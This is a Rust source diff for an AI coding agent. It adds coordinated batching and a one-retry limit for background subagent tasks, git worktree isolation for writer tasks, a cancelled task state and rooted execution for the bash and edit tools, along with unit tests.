+        while let Some(notification) = inner.pending.pop_front() {
+            if !tracked.contains(notification.id.as_str()) {
+                retained.push_back(notification);
+            }
+        }
+        inner.pending = retained;
+        tracked_ids
+            .into_iter()
+            .map(|id| TaskNotification {
+                state: inner
+                    .tasks
+                    .get(&id)
+                    .map(|task| task.state.clone())
+                    .unwrap_or_else(|| {
+                        TaskState::Failed("coordinator task was evicted before delivery".into())
+                    }),
+                id,
+            })
+            .collect()
     }
 
     /// dirge-9xo: peek whether there's at least one pending
@@ -270,7 +565,29 @@ impl BackgroundStore {
     /// path to decide whether a subagent completion should kick
     /// the parent agent into a new turn.
     pub fn has_pending_notifications(&self) -> bool {
-        !self.lock().pending.is_empty()
+        let inner = self.lock();
+        let Some(coordinator) = &inner.coordinator else {
+            return !inner.pending.is_empty();
+        };
+        if coordinator.active_task_ids.is_empty() {
+            return !inner.pending.is_empty();
+        }
+        let tracked: std::collections::HashSet<_> = coordinator
+            .active_task_ids
+            .iter()
+            .map(String::as_str)
+            .collect();
+        let batch_terminal = coordinator.active_task_ids.iter().all(|id| {
+            !matches!(
+                inner.tasks.get(id).map(|task| &task.state),
+                Some(TaskState::Running)
+            )
+        });
+        batch_terminal
+            || inner
+                .pending
+                .iter()
+                .any(|n| !tracked.contains(n.id.as_str()))
     }
 
     fn lock(&self) -> std::sync::MutexGuard<'_, Inner> {
@@ -315,22 +632,61 @@ pub fn followup_from_background_store(
             if drained.is_empty() {
                 return Vec::new();
             }
+            let coordinated = store.coordinator_strategy().is_some();
             let mut body = String::with_capacity(256);
             body.push_str("<system-reminder>\n");
-            body.push_str("The following background tasks finished since your last turn:\n\n");
+            if coordinated {
+                body.push_str("Coordinator batch is complete. Reconcile every dispatch before dispatching more work.\n\n");
+            } else {
+                body.push_str("The following background tasks finished since your last turn:\n\n");
+            }
             for (i, n) in drained.iter().enumerate() {
                 if i > 0 {
                     body.push('\n');
                 }
-                match &n.state {
-                    TaskState::Completed(text) => {
-                        body.push_str(&format!("[task {}] completed: {}\n", n.id, text));
+                if coordinated {
+                    if let Some(dispatch) = store.coordinator_dispatch(&n.id) {
+                        let tier = if dispatch.is_writer {
+                            "readwrite"
+                        } else {
+                            "readonly"
+                        };
+                        body.push_str(&format!(
+                            "[task {} ({tier})] prompt: {}\n",
+                            n.id, dispatch.prompt
+                        ));
+                        if let Some(retry_of) = dispatch.retry_of {
+                            body.push_str(&format!("retry of: {retry_of}\n"));
+                        }
+                        if let Some(retried_by) = dispatch.retried_by {
+                            body.push_str(&format!("retry budget: exhausted by {retried_by}\n"));
+                        } else if matches!(n.state, TaskState::Failed(_)) {
+                            body.push_str("retry budget: 1/1 available\n");
+                        }
+                        if let Some(branch) = dispatch.worktree_branch {
+                            body.push_str(&format!("writer branch: {branch}\n"));
+                        }
+                        if let Some(path) = dispatch.worktree_path {
+                            body.push_str(&format!("writer worktree retained: {path}\n"));
+                        }
                     }
-                    TaskState::Failed(err) => {
-                        body.push_str(&format!("[task {}] failed: {}\n", n.id, err));
+                    match &n.state {
+                        TaskState::Completed(text) => {
+                            body.push_str(&format!("completed: {text}\n"))
+                        }
+                        TaskState::Failed(err) => body.push_str(&format!("failed: {err}\n")),
+                        TaskState::Running => {}
                     }
-                    // notify() never queues Running, defensive no-op.
-                    TaskState::Running => {}
+                } else {
+                    match &n.state {
+                        TaskState::Completed(text) => {
+                            body.push_str(&format!("[task {}] completed: {}\n", n.id, text))
+                        }
+                        TaskState::Failed(err) => {
+                            body.push_str(&format!("[task {}] failed: {}\n", n.id, err))
+                        }
+                        TaskState::Running => {}
+                    }
                 }
             }
             body.push_str("</system-reminder>");
@@ -369,9 +725,14 @@ pub(crate) fn prepend_pending_notifications(
         return prompt.to_string();
     }
 
+    let coordinated = store.coordinator_strategy().is_some();
     let mut out = String::with_capacity(prompt.len() + 256);
     out.push_str("<system-reminder>\n");
-    out.push_str("The following background tasks finished since your last turn:\n\n");
+    if coordinated {
+        out.push_str("Coordinator batch is complete. Reconcile every dispatch before dispatching more work.\n\n");
+    } else {
+        out.push_str("The following background tasks finished since your last turn:\n\n");
+    }
     for (i, n) in drained.iter().enumerate() {
         if i > 0 {
             out.push('\n');
@@ -427,6 +788,78 @@ fn truncate_state(state: TaskState) -> TaskState {
 #[cfg(test)]
 mod tests {
     use super::*;
+
+    #[test]
+    fn coordinator_allows_one_retry_for_a_failed_dispatch() {
+        let store = BackgroundStore::new();
+        store.enable_coordinator(crate::config::SubagentDispatchStrategy::Full);
+        store
+            .insert_coordinator_dispatch("first".into(), "failed work".into(), false, None)
+            .unwrap();
+        store.notify("first", TaskState::Failed("boom".into()));
+        store
+            .insert_coordinator_dispatch(
+                "retry".into(),
+                "retry failed work".into(),
+                false,
+                Some("first"),
+            )
+            .unwrap();
+
+        let error = store
+            .insert_coordinator_dispatch(
+                "second-retry".into(),
+                "retry again".into(),
+                false,
+                Some("first"),
+            )
+            .unwrap_err();
+        assert!(error.contains("already used its coordinator retry"));
+    }
+
+    #[test]
+    fn coordinator_serializes_writers_but_not_readers() {
+        let store = BackgroundStore::new();
+        store.enable_coordinator(crate::config::SubagentDispatchStrategy::Full);
+        store
+            .insert_coordinator_dispatch("writer".into(), "edit code".into(), true, None)
+            .unwrap();
+        store
+            .insert_coordinator_dispatch("reader".into(), "inspect code".into(), false, None)
+            .unwrap();
+
+        let error = store
+            .insert_coordinator_dispatch("writer-two".into(), "edit more".into(), true, None)
+            .unwrap_err();
+        assert!(error.contains("serialized writer"));
+    }
+
+    #[test]
+    fn coordinator_dispatch_records_worktree_metadata() {
+        let store = BackgroundStore::new();
+        store.enable_coordinator(crate::config::SubagentDispatchStrategy::Full);
+        store
+            .insert_coordinator_dispatch("writer".into(), "edit code".into(), true, None)
+            .unwrap();
+
+        store
+            .set_coordinator_dispatch_worktree(
+                "writer",
+                "dirge-task-writer".into(),
+                "/tmp/dirge-task-writer".into(),
+            )
+            .unwrap();
+
+        let dispatch = store.coordinator_dispatch("writer").unwrap();
+        assert_eq!(
+            dispatch.worktree_branch.as_deref(),
+            Some("dirge-task-writer")
+        );
+        assert_eq!(
+            dispatch.worktree_path.as_deref(),
+            Some("/tmp/dirge-task-writer")
+        );
+    }
 
     #[test]
     fn insert_then_get_returns_running() {
@@ -1068,6 +1501,40 @@ mod tests {
         assert_eq!(first.len(), 1);
         let second = hook().await;
         assert!(second.is_empty(), "second poll must not redeliver");
+    }
+
+    #[test]
+    fn coordinator_batch_withholds_partial_results_until_every_member_is_terminal() {
+        let store = BackgroundStore::new();
+        store.enable_coordinator(crate::config::SubagentDispatchStrategy::Full);
+        store.insert_coordinated("first".into());
+        store.insert_coordinated("second".into());
+
+        store.notify("first", TaskState::Completed("one".into()));
+        assert!(store.drain_notifications().is_empty());
+        assert!(!store.has_pending_notifications());
+
+        store.notify("second", TaskState::Failed("two".into()));
+        let drained = store.drain_notifications();
+        assert_eq!(drained.len(), 2);
+        assert_eq!(drained[0].id, "first");
+        assert_eq!(drained[1].id, "second");
+        assert!(store.drain_notifications().is_empty());
+    }
+
+    #[test]
+    fn coordinator_opens_next_generation_after_delivery() {
+        let store = BackgroundStore::new();
+        store.enable_coordinator(crate::config::SubagentDispatchStrategy::Full);
+        store.insert_coordinated("first".into());
+        store.notify("first", TaskState::Completed("one".into()));
+        assert_eq!(store.drain_notifications().len(), 1);
+
+        store.insert_coordinated("second".into());
+        store.notify("second", TaskState::Completed("two".into()));
+        let drained = store.drain_notifications();
+        assert_eq!(drained.len(), 1);
+        assert_eq!(drained[0].id, "second");
     }
 
     // Concurrency smoke: many threads inserting + notifying must not lose

--- a/src/agent/tools/background.rs
+++ b/src/agent/tools/background.rs
@@ -142,6 +142,7 @@ pub enum TaskState {
     Running,
     Completed(String),
     Failed(String),
+    Cancelled(String),
 }
 
 #[derive(Debug, Clone)]
@@ -236,7 +237,7 @@ impl BackgroundStore {
                 .join("\n")
         };
         Some(format!(
-            "Coordinator dispatch is enabled. {mode}\n\nRead-only subagent profiles:\n{}\n\nRead-write subagent profiles:\n{}\n\nDispatch at most four background subagents per wave. Reconcile the complete batch before dispatching more work. Do not poll task_status for partial output. A failed coordinator task may be retried once with retry_of=<task-id>; then repair on the main thread. Writers are serialized until rooted worktree isolation is available. Keep internal reconciliation summaries private and provide the user only a final summary. Do not combine this strategy with plugins/orchestrator.janet or plugins/delegate.janet.",
+            "Coordinator dispatch is enabled. {mode}\n\nRead-only subagent profiles:\n{}\n\nRead-write subagent profiles:\n{}\n\nDispatch at most four background subagents per wave. Reconcile completed work, failures, remaining requirements, required verification, and the next action before dispatching more work. Do not poll task_status for partial output. A failed coordinator task may be retried once with retry_of=<task-id>; then repair on the main thread. Isolated writers may run concurrently in their worktrees; shared-checkout writers are serialized. Writers must not auto-merge: report their branch, commits, tests, and salvage path for the coordinator to reconcile. Keep internal reconciliation summaries private and provide the user only a final summary. Do not combine this strategy with plugins/orchestrator.janet or plugins/delegate.janet.",
             profiles(&coordinator.profiles.readonly),
             profiles(&coordinator.profiles.readwrite),
         ))
@@ -562,7 +563,7 @@ impl BackgroundStore {
         let cancelled_label = "cancelled — session switched".to_string();
         for task in inner.tasks.values_mut() {
             if matches!(task.state, TaskState::Running) {
-                task.state = TaskState::Failed(cancelled_label.clone());
+                task.state = TaskState::Cancelled(cancelled_label.clone());
             }
         }
         // Drop pending notifications. They belong to the previous
@@ -694,6 +695,97 @@ impl BackgroundStore {
     }
 }
 
+fn format_notifications(store: &BackgroundStore, notifications: &[TaskNotification]) -> String {
+    let coordinated = store.coordinator_strategy().is_some();
+    let mut body = String::with_capacity(256);
+    if coordinated {
+        body.push_str("Coordinator batch is complete. Reconcile completed work, failures, remaining requirements, required verification, and the next action before dispatching more work.\n\n");
+    } else {
+        body.push_str("The following background tasks finished since your last turn:\n\n");
+    }
+    for (i, notification) in notifications.iter().enumerate() {
+        if i > 0 {
+            body.push('\n');
+        }
+        if coordinated {
+            if let Some(dispatch) = store.coordinator_dispatch(&notification.id) {
+                let tier = if dispatch.is_writer {
+                    "readwrite"
+                } else {
+                    "readonly"
+                };
+                body.push_str(&format!(
+                    "[task {} ({tier})] prompt: {}\n",
+                    notification.id, dispatch.prompt
+                ));
+                if let Some(retry_of) = dispatch.retry_of {
+                    body.push_str(&format!("retry of: {retry_of}\n"));
+                }
+                if let Some(retried_by) = dispatch.retried_by {
+                    body.push_str(&format!("retry budget: exhausted by {retried_by}\n"));
+                } else if matches!(notification.state, TaskState::Failed(_)) {
+                    body.push_str("retry budget: 1/1 available\n");
+                }
+                if dispatch.is_writer {
+                    body.push_str(&format!(
+                        "writer isolation: {}\n",
+                        if dispatch.is_isolated_writer {
+                            "worktree"
+                        } else {
+                            "serialized parent checkout"
+                        }
+                    ));
+                }
+                if let Some(branch) = dispatch.worktree_branch {
+                    body.push_str(&format!("writer branch: {branch}\n"));
+                }
+                if let Some(dirty) = dispatch.worktree_dirty {
+                    body.push_str(&format!(
+                        "writer worktree: {}\n",
+                        if dirty {
+                            "dirty; retained for salvage"
+                        } else {
+                            "clean"
+                        }
+                    ));
+                }
+                if !dispatch.worktree_commits.is_empty() {
+                    body.push_str(&format!(
+                        "writer commits: {}\n",
+                        dispatch.worktree_commits.join(", ")
+                    ));
+                }
+                if let Some(path) = dispatch.worktree_path {
+                    body.push_str(&format!("writer salvage path: {path}\n"));
+                }
+                if dispatch.worktree_retained == Some(false) {
+                    body.push_str("writer worktree removed (clean with no commits)\n");
+                }
+            }
+            match &notification.state {
+                TaskState::Completed(text) => body.push_str(&format!("completed: {text}\n")),
+                TaskState::Failed(error) => body.push_str(&format!("failed: {error}\n")),
+                TaskState::Cancelled(reason) => body.push_str(&format!("cancelled: {reason}\n")),
+                TaskState::Running => {}
+            }
+        } else {
+            match &notification.state {
+                TaskState::Completed(text) => {
+                    body.push_str(&format!("[task {}] completed: {text}\n", notification.id))
+                }
+                TaskState::Failed(error) => {
+                    body.push_str(&format!("[task {}] failed: {error}\n", notification.id))
+                }
+                TaskState::Cancelled(reason) => {
+                    body.push_str(&format!("[task {}] cancelled: {reason}\n", notification.id))
+                }
+                TaskState::Running => {}
+            }
+        }
+    }
+    body
+}
+
 /// dirge-9tfq: build a `GetFollowupMessagesFn` bound to this store.
 ///
 /// At the outer-loop boundary (inner loop has no more tool calls AND no
@@ -721,94 +813,10 @@ pub fn followup_from_background_store(
             if drained.is_empty() {
                 return Vec::new();
             }
-            let coordinated = store.coordinator_strategy().is_some();
-            let mut body = String::with_capacity(256);
-            body.push_str("<system-reminder>\n");
-            if coordinated {
-                body.push_str("Coordinator batch is complete. Reconcile every dispatch before dispatching more work.\n\n");
-            } else {
-                body.push_str("The following background tasks finished since your last turn:\n\n");
-            }
-            for (i, n) in drained.iter().enumerate() {
-                if i > 0 {
-                    body.push('\n');
-                }
-                if coordinated {
-                    if let Some(dispatch) = store.coordinator_dispatch(&n.id) {
-                        let tier = if dispatch.is_writer {
-                            "readwrite"
-                        } else {
-                            "readonly"
-                        };
-                        body.push_str(&format!(
-                            "[task {} ({tier})] prompt: {}\n",
-                            n.id, dispatch.prompt
-                        ));
-                        if let Some(retry_of) = dispatch.retry_of {
-                            body.push_str(&format!("retry of: {retry_of}\n"));
-                        }
-                        if let Some(retried_by) = dispatch.retried_by {
-                            body.push_str(&format!("retry budget: exhausted by {retried_by}\n"));
-                        } else if matches!(n.state, TaskState::Failed(_)) {
-                            body.push_str("retry budget: 1/1 available\n");
-                        }
-                        if dispatch.is_writer {
-                            body.push_str(&format!(
-                                "writer isolation: {}\n",
-                                if dispatch.is_isolated_writer {
-                                    "worktree"
-                                } else {
-                                    "serialized parent checkout"
-                                }
-                            ));
-                        }
-                        if let Some(branch) = dispatch.worktree_branch {
-                            body.push_str(&format!("writer branch: {branch}\n"));
-                        }
-                        if let Some(dirty) = dispatch.worktree_dirty {
-                            body.push_str(&format!(
-                                "writer worktree: {}\n",
-                                if dirty {
-                                    "dirty; retained for salvage"
-                                } else {
-                                    "clean"
-                                }
-                            ));
-                        }
-                        if !dispatch.worktree_commits.is_empty() {
-                            body.push_str(&format!(
-                                "writer commits: {}\n",
-                                dispatch.worktree_commits.join(", ")
-                            ));
-                        }
-                        if let Some(path) = dispatch.worktree_path {
-                            body.push_str(&format!("writer salvage path: {path}\n"));
-                        }
-                        if dispatch.worktree_retained == Some(false) {
-                            body.push_str("writer worktree removed (clean with no commits)\n");
-                        }
-                    }
-                    match &n.state {
-                        TaskState::Completed(text) => {
-                            body.push_str(&format!("completed: {text}\n"))
-                        }
-                        TaskState::Failed(err) => body.push_str(&format!("failed: {err}\n")),
-                        TaskState::Running => {}
-                    }
-                } else {
-                    match &n.state {
-                        TaskState::Completed(text) => {
-                            body.push_str(&format!("[task {}] completed: {}\n", n.id, text))
-                        }
-                        TaskState::Failed(err) => {
-                            body.push_str(&format!("[task {}] failed: {}\n", n.id, err))
-                        }
-                        TaskState::Running => {}
-                    }
-                }
-            }
-            body.push_str("</system-reminder>");
-            vec![LoopMessage::User(UserMessage::text(body))]
+            vec![LoopMessage::User(UserMessage::text(format!(
+                "<system-reminder>\n{}</system-reminder>",
+                format_notifications(&store, &drained)
+            )))]
         })
     })
 }
@@ -843,33 +851,10 @@ pub(crate) fn prepend_pending_notifications(
         return prompt.to_string();
     }
 
-    let coordinated = store.coordinator_strategy().is_some();
-    let mut out = String::with_capacity(prompt.len() + 256);
-    out.push_str("<system-reminder>\n");
-    if coordinated {
-        out.push_str("Coordinator batch is complete. Reconcile every dispatch before dispatching more work.\n\n");
-    } else {
-        out.push_str("The following background tasks finished since your last turn:\n\n");
-    }
-    for (i, n) in drained.iter().enumerate() {
-        if i > 0 {
-            out.push('\n');
-        }
-        match &n.state {
-            TaskState::Completed(text) => {
-                out.push_str(&format!("Task {} (completed):\n{}\n", n.id, text));
-            }
-            TaskState::Failed(err) => {
-                out.push_str(&format!("Task {} (failed):\n{}\n", n.id, err));
-            }
-            // Running is never queued for notification (notify() rejects it),
-            // but treat defensively as "no terminal info to report".
-            TaskState::Running => {}
-        }
-    }
-    out.push_str("</system-reminder>\n\n");
-    out.push_str(prompt);
-    out
+    format!(
+        "<system-reminder>\n{}</system-reminder>\n\n{prompt}",
+        format_notifications(store, &drained)
+    )
 }
 
 /// dirge-nmv5: relay large `Completed` payloads through the
@@ -899,6 +884,7 @@ fn truncate_state(state: TaskState) -> TaskState {
                 "task error",
             ))
         }
+        TaskState::Cancelled(reason) => TaskState::Cancelled(reason),
         s => s,
     }
 }
@@ -935,6 +921,33 @@ mod tests {
             )
             .unwrap_err();
         assert!(error.contains("already used its coordinator retry"));
+    }
+
+    #[test]
+    fn coordinator_rejects_retry_for_cancelled_dispatch() {
+        let store = BackgroundStore::new();
+        store.enable_coordinator(crate::config::SubagentDispatchStrategy::Full);
+        store
+            .insert_coordinator_dispatch(
+                "cancelled".into(),
+                "cancelled work".into(),
+                false,
+                false,
+                None,
+            )
+            .unwrap();
+        store.notify("cancelled", TaskState::Cancelled("session switched".into()));
+
+        let error = store
+            .insert_coordinator_dispatch(
+                "retry".into(),
+                "retry cancelled work".into(),
+                false,
+                false,
+                Some("cancelled"),
+            )
+            .unwrap_err();
+        assert!(error.contains("must have failed"));
     }
 
     #[test]
@@ -1037,15 +1050,15 @@ mod tests {
         // Pending notifications gone.
         assert_eq!(store.pending_len(), 0, "cancel_all must clear pending");
 
-        // The still-Running task now reads as Failed("cancelled — ...").
+        // The still-Running task now reads as Cancelled("cancelled — ...").
         let t1 = store.get("t1").expect("t1 retained");
         match &t1.state {
-            TaskState::Failed(reason) => assert!(
+            TaskState::Cancelled(reason) => assert!(
                 reason.contains("cancelled"),
                 "expected cancellation reason; got {:?}",
                 reason
             ),
-            other => panic!("expected Failed cancelled, got {:?}", other),
+            other => panic!("expected Cancelled, got {:?}", other),
         }
 
         // Give the runtime a tick so the abort lands.
@@ -1313,6 +1326,37 @@ mod tests {
         let out = prepend_pending_notifications("user msg", Some(&store));
         assert!(out.contains("Task t1 (failed):"));
         assert!(out.contains("kaboom"));
+    }
+
+    #[test]
+    fn coordinator_prepend_includes_reconciliation_metadata() {
+        let store = BackgroundStore::new();
+        store.enable_coordinator(crate::config::SubagentDispatchStrategy::Full);
+        store
+            .insert_coordinator_dispatch("writer".into(), "edit code".into(), true, true, None)
+            .unwrap();
+        store
+            .set_coordinator_dispatch_worktree(
+                "writer",
+                "dirge-task-writer".into(),
+                "/tmp/dirge-task-writer".into(),
+            )
+            .unwrap();
+        store.set_coordinator_dispatch_worktree_outcome(
+            "writer",
+            vec!["abc123".into()],
+            false,
+            true,
+        );
+        store.notify("writer", TaskState::Completed("done".into()));
+
+        let out = prepend_pending_notifications("user msg", Some(&store));
+        assert!(out.contains("prompt: edit code"));
+        assert!(out.contains("writer isolation: worktree"));
+        assert!(out.contains("writer branch: dirge-task-writer"));
+        assert!(out.contains("writer commits: abc123"));
+        assert!(out.contains("writer salvage path: /tmp/dirge-task-writer"));
+        assert!(out.contains("completed: done"));
     }
 
     // Regression: prepend MUST consume the queue. Calling it twice in

--- a/src/agent/tools/bash/check.rs
+++ b/src/agent/tools/bash/check.rs
@@ -14,7 +14,16 @@ use crate::semantic::adapters::bash;
 #[allow(unused_imports)]
 use crate::sync_util::LockExt;
 
-/// dirge-sb2n: paths a bash command mutates — output-redirect targets
+#[cfg_attr(feature = "semantic-bash", allow(dead_code))]
+pub(crate) fn coarse_complex_syntax(command: &str) -> bool {
+    command.contains("$(")
+        || command.contains('`')
+        || command.contains("<(")
+        || command.contains(">(")
+        || command.contains("$'")
+        || command.contains("<<")
+}
+
 /// (`> f`, `cat > f <<'EOF'`) plus the positional args of file-mutating
 /// commands (`rm`/`mv`/`cp`/`touch`/…). Reuses the same tree-sitter
 /// extractors the permission layer runs (`extract_redirect_targets` +
@@ -241,7 +250,7 @@ pub(super) async fn check_bash_segments(
         // command-substitution / heredoc / ANSI-C quoting are checked as
         // one whole-command claim. Shared with the `/why` explainer
         // (dirge-p3vf) so enforcement and explanation can't drift.
-        let has_substitution = crate::semantic::adapters::bash::coarse_complex_syntax(command);
+        let has_substitution = coarse_complex_syntax(command);
         if has_substitution {
             claims.push(complex_cmd_claim(command));
         } else {

--- a/src/agent/tools/bash/mod.rs
+++ b/src/agent/tools/bash/mod.rs
@@ -1,7 +1,7 @@
 use rig::completion::ToolDefinition;
 use rig::tool::Tool;
 
-mod check;
+pub(crate) mod check;
 pub(crate) mod exec;
 use exec::spawn_streaming_shell;
 

--- a/src/agent/tools/bash/mod.rs
+++ b/src/agent/tools/bash/mod.rs
@@ -13,12 +13,13 @@ use crate::agent::agent_loop::tool_input_repair::with_contract_hint;
 use crate::agent::tools::cache::ToolCache;
 use crate::agent::tools::{AskSender, BashArgs, PermCheck, ToolError};
 
-use crate::sandbox::Sandbox;
+use crate::sandbox::{Sandbox, SandboxExecutionRoot};
 
 pub struct BashTool {
     pub permission: Option<PermCheck>,
     pub ask_tx: Option<AskSender>,
     pub sandbox: Sandbox,
+    execution_root: Option<SandboxExecutionRoot>,
     cache: Option<ToolCache>,
     /// Shared background-shell registry. When present, `background: true`
     /// runs the command detached (unbounded) and tracks it here so the
@@ -35,6 +36,7 @@ impl BashTool {
             permission,
             ask_tx,
             sandbox,
+            execution_root: None,
             cache: None,
             shell_store: None,
         }
@@ -50,9 +52,15 @@ impl BashTool {
             permission,
             ask_tx,
             sandbox,
+            execution_root: None,
             cache: Some(cache),
             shell_store: None,
         }
+    }
+
+    pub fn with_execution_root(mut self, execution_root: Option<SandboxExecutionRoot>) -> Self {
+        self.execution_root = execution_root;
+        self
     }
 
     /// Inject the shared background-shell registry so `background: true`
@@ -150,7 +158,11 @@ impl Tool for BashTool {
             if let Some(ref cache) = self.cache {
                 cache.clear();
             }
-            let wrapped = self.sandbox.wrap_command(&command);
+            let wrapped = if let Some(root) = &self.execution_root {
+                self.sandbox.wrap_command_in(&command, root)
+            } else {
+                self.sandbox.wrap_command(&command)
+            };
             let handle = spawn_streaming_shell(wrapped, store.clone(), id.clone(), args.timeout);
             store.attach_handle(&id, handle);
             let timeout_note = match args.timeout {
@@ -172,7 +184,11 @@ impl Tool for BashTool {
             return Err(ToolError::Msg("timeout must be > 0".to_string()));
         }
 
-        let output = self.sandbox.exec(&command, secs).await?;
+        let output = if let Some(root) = &self.execution_root {
+            self.sandbox.exec_in(&command, secs, root).await?
+        } else {
+            self.sandbox.exec(&command, secs).await?
+        };
 
         // F12: `merged` already contains stdout + stderr in arrival
         // order. Previously we concatenated stdout then stderr,

--- a/src/agent/tools/bash/tests.rs
+++ b/src/agent/tools/bash/tests.rs
@@ -109,7 +109,79 @@ async fn background_bash_registers_shell_and_streams_output() {
     assert_eq!(store.running_count(), 0);
 }
 
-/// Test helper: build a single op-based rule (tool-agnostic).
+/// A rooted foreground BashTool executes from the supplied worktree.
+#[tokio::test]
+async fn rooted_foreground_bash_uses_worktree() {
+    use crate::agent::tools::BashArgs;
+    use crate::sandbox::{Sandbox, SandboxExecutionRoot, SandboxMode};
+
+    let worktree = std::env::temp_dir().join(format!("dirge-bash-root-{}", uuid::Uuid::new_v4()));
+    std::fs::create_dir_all(&worktree).unwrap();
+    let tool = BashTool::new(None, None, Sandbox::new(SandboxMode::Off)).with_execution_root(Some(
+        SandboxExecutionRoot {
+            worktree: worktree.clone(),
+            main_git_dir: worktree.join(".git"),
+        },
+    ));
+    let output = tool
+        .call(BashArgs {
+            command: "pwd".to_string(),
+            timeout: Some(5),
+            background: None,
+        })
+        .await
+        .unwrap();
+    assert!(output.contains(&*worktree.to_string_lossy()));
+    std::fs::remove_dir_all(worktree).unwrap();
+}
+
+/// A rooted background BashTool applies the execution root before spawning.
+#[tokio::test]
+async fn rooted_background_bash_uses_worktree() {
+    use crate::agent::tools::BashArgs;
+    use crate::agent::tools::bg_shell::BackgroundShellStore;
+    use crate::sandbox::{Sandbox, SandboxExecutionRoot, SandboxMode};
+
+    let worktree =
+        std::env::temp_dir().join(format!("dirge-bash-bg-root-{}", uuid::Uuid::new_v4()));
+    std::fs::create_dir_all(&worktree).unwrap();
+    let store = BackgroundShellStore::new();
+    let tool = BashTool::new(None, None, Sandbox::new(SandboxMode::Off))
+        .with_execution_root(Some(SandboxExecutionRoot {
+            worktree: worktree.clone(),
+            main_git_dir: worktree.join(".git"),
+        }))
+        .with_shell_store(Some(store.clone()));
+    let response = tool
+        .call(BashArgs {
+            command: "pwd".to_string(),
+            timeout: None,
+            background: Some(true),
+        })
+        .await
+        .unwrap();
+    let id = response
+        .split("id: ")
+        .nth(1)
+        .and_then(|s| s.split(['(', ' ']).next())
+        .unwrap();
+    let mut output = String::new();
+    for _ in 0..200 {
+        if let Some((chunk, status)) = store.read_new(id) {
+            output.push_str(&chunk);
+            if !status.is_running() {
+                break;
+            }
+        }
+        tokio::time::sleep(Duration::from_millis(20)).await;
+    }
+    assert!(
+        output.contains(&*worktree.to_string_lossy()),
+        "got: {output}"
+    );
+    std::fs::remove_dir_all(worktree).unwrap();
+}
+
 #[cfg(feature = "semantic-bash")]
 fn rule(
     op: crate::permission::OpSpec,

--- a/src/agent/tools/edit.rs
+++ b/src/agent/tools/edit.rs
@@ -6,7 +6,9 @@ use rig::tool::Tool;
 
 use crate::agent::agent_loop::tool_input_repair::with_contract_hint;
 use crate::agent::tools::cache::ToolCache;
-use crate::agent::tools::{AskSender, EditArgs, PermCheck, ToolError, require_and_resolve};
+use crate::agent::tools::{
+    AskSender, EditArgs, PermCheck, ToolError, ToolRoot, require_and_resolve_rooted,
+};
 #[cfg(feature = "lsp")]
 use crate::lsp::manager::LspManager;
 
@@ -14,6 +16,7 @@ pub struct EditTool {
     pub permission: Option<PermCheck>,
     pub ask_tx: Option<AskSender>,
     cache: Option<ToolCache>,
+    root: Option<ToolRoot>,
     /// When set, the tool touches the edited file on the LSP server and
     /// appends any diagnostic block to its output. `None` reproduces the
     /// pre-LSP behaviour.
@@ -28,6 +31,7 @@ impl EditTool {
             permission,
             ask_tx,
             cache: None,
+            root: None,
             #[cfg(feature = "lsp")]
             lsp_manager: None,
         }
@@ -43,9 +47,15 @@ impl EditTool {
             permission,
             ask_tx,
             cache: Some(cache),
+            root: None,
             #[cfg(feature = "lsp")]
             lsp_manager,
         }
+    }
+
+    pub fn rooted(mut self, root: ToolRoot) -> Self {
+        self.root = Some(root);
+        self
     }
 
     pub(crate) fn show_diff(
@@ -136,7 +146,8 @@ impl Tool for EditTool {
         // (shared guard; the schema requires an absolute path).
         // Audit H12: require absolute + pin file operations to the canonical
         // path the permission check resolved.
-        let resolved_path = require_and_resolve(
+        let resolved_path = require_and_resolve_rooted(
+            self.root.as_ref(),
             &self.permission,
             &self.ask_tx,
             "edit",
@@ -842,6 +853,7 @@ mod read_gate_tests {
             permission: None,
             ask_tx: None,
             cache: Some(cache),
+            root: None,
             #[cfg(feature = "lsp")]
             lsp_manager: None,
         }

--- a/src/agent/tools/edit_lines.rs
+++ b/src/agent/tools/edit_lines.rs
@@ -24,7 +24,9 @@ use rig::tool::Tool;
 use crate::agent::agent_loop::tool_input_repair::with_contract_hint;
 use crate::agent::tools::cache::ToolCache;
 use crate::agent::tools::line_hash::line_hash;
-use crate::agent::tools::{AskSender, EditLinesArgs, PermCheck, ToolError, require_and_resolve};
+use crate::agent::tools::{
+    AskSender, EditLinesArgs, PermCheck, ToolError, ToolRoot, require_and_resolve_rooted,
+};
 #[cfg(feature = "lsp")]
 use crate::lsp::manager::LspManager;
 
@@ -32,6 +34,7 @@ pub struct EditLinesTool {
     pub permission: Option<PermCheck>,
     pub ask_tx: Option<AskSender>,
     cache: Option<ToolCache>,
+    root: Option<ToolRoot>,
     #[cfg(feature = "lsp")]
     #[allow(dead_code)]
     lsp_manager: Option<Arc<LspManager>>,
@@ -44,6 +47,7 @@ impl EditLinesTool {
             permission,
             ask_tx,
             cache: None,
+            root: None,
             #[cfg(feature = "lsp")]
             lsp_manager: None,
         }
@@ -59,9 +63,15 @@ impl EditLinesTool {
             permission,
             ask_tx,
             cache: Some(cache),
+            root: None,
             #[cfg(feature = "lsp")]
             lsp_manager,
         }
+    }
+
+    pub fn rooted(mut self, root: ToolRoot) -> Self {
+        self.root = Some(root);
+        self
     }
 }
 
@@ -187,7 +197,8 @@ impl Tool for EditLinesTool {
     }
 
     async fn call(&self, args: EditLinesArgs) -> Result<String, ToolError> {
-        let resolved_path = require_and_resolve(
+        let resolved_path = require_and_resolve_rooted(
+            self.root.as_ref(),
             &self.permission,
             &self.ask_tx,
             "edit",

--- a/src/agent/tools/find_files.rs
+++ b/src/agent/tools/find_files.rs
@@ -6,14 +6,15 @@ use rig::tool::Tool;
 use crate::agent::agent_loop::tool_input_repair::with_contract_hint;
 use crate::agent::tools::cache::ToolCache;
 use crate::agent::tools::{
-    AskSender, FindFilesArgs, MAX_FIND_RESULTS, PermCheck, ToolError, check_perm, check_perm_path,
-    is_skip_dir,
+    AskSender, FindFilesArgs, MAX_FIND_RESULTS, PermCheck, ToolError, ToolRoot, check_perm,
+    check_perm_path, is_skip_dir,
 };
 
 pub struct FindFilesTool {
     pub permission: Option<PermCheck>,
     pub ask_tx: Option<AskSender>,
     pub cache: Option<ToolCache>,
+    root: Option<ToolRoot>,
 }
 
 impl FindFilesTool {
@@ -23,6 +24,7 @@ impl FindFilesTool {
             permission,
             ask_tx,
             cache: None,
+            root: None,
         }
     }
 
@@ -35,7 +37,13 @@ impl FindFilesTool {
             permission,
             ask_tx,
             cache: Some(cache),
+            root: None,
         }
+    }
+
+    pub fn with_root(mut self, root: ToolRoot) -> Self {
+        self.root = Some(root);
+        self
     }
 }
 
@@ -76,22 +84,25 @@ impl Tool for FindFilesTool {
     }
 
     async fn call(&self, args: FindFilesArgs) -> Result<String, ToolError> {
